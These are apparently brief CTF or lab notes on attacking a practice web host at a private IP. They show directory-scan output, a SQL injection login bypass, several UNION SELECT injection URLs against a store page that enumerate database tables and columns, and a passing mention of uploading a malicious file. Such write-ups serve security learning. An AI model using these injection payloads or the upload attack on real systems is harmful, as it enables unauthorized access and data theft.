Comment on page
http
[00:17:57] 301 - 316B - /admin -> http://192.168.74.111/admin/
[00:17:57] 200 - 3KB - /admin/?/login
[00:17:57] 200 - 3KB - /admin/
[00:17:57] 200 - 3KB - /admin/index.php
[00:17:57] 302 - 24KB - /admin/home.php -> http://192.168.74.111/admin/index.php
[00:18:02] 200 - 0B - /checklogin.php
[00:18:03] 302 - 10KB - /dashboard.php -> http://192.168.74.111/index.php
[00:18:07] 200 - 2KB - /header.php
[00:18:07] 200 - 3KB - /index.php
[00:18:08] 200 - 11KB - /index.html
[00:18:08] 200 - 3KB - /index.php/login/
[00:18:10] 200 - 75B - /logout.php
[00:18:14] 302 - 7KB - /profile.php -> http://192.168.74.111/index.php
[00:18:15] 200 - 14B - /robots.txt
[00:18:16] 301 - 317B - /secret -> http://192.168.74.111/secret/
[00:18:16] 200 - 108B - /secret/
[00:18:18] 301 - 316B - /store -> http://192.168.74.111/store/
CRM
got in using admin'-- -
SQL injection vuln found
returns the correct page.
which means we can extract data from here.
played around and found a position I could get data from.
http://192.168.74.111/store/book.php?bookisbn=%27UNION%20SELECT%20NULL,%20NULL,%20table_name,%20NULL,%20NULL,%20NULL,%20NULL%20FROM%20information_schema.tables%20--%20-
ADMINISTRABLE_ROLE_AUTHORIZATIONS table found
http://192.168.74.111/store/book.php?bookisbn=%27UNION+SELECT+NULL%2C+NULL%2C+column_name%2C+NULL%2CNULL%2C+NULL%2C+NULL+FROM+information_schema.columns+WHERE+table_name+%3D+%22ADMINISTRABLE_ROLE_AUTHORIZATIONS%22--+-
GRANTEE
http://192.168.74.111/store/book.php?bookisbn='UNION SELECT NULL, NULL, GRANTEE, NULL, NULL, NULL, NULL FROM "ADMINISTRABLE_ROLE_AUTHORIZATIONS"-- -
so this was a rabit hole...
There was an uploadable place in store --> uploaded a malicious stuff there and accessed through img/
Last modified 1yr ago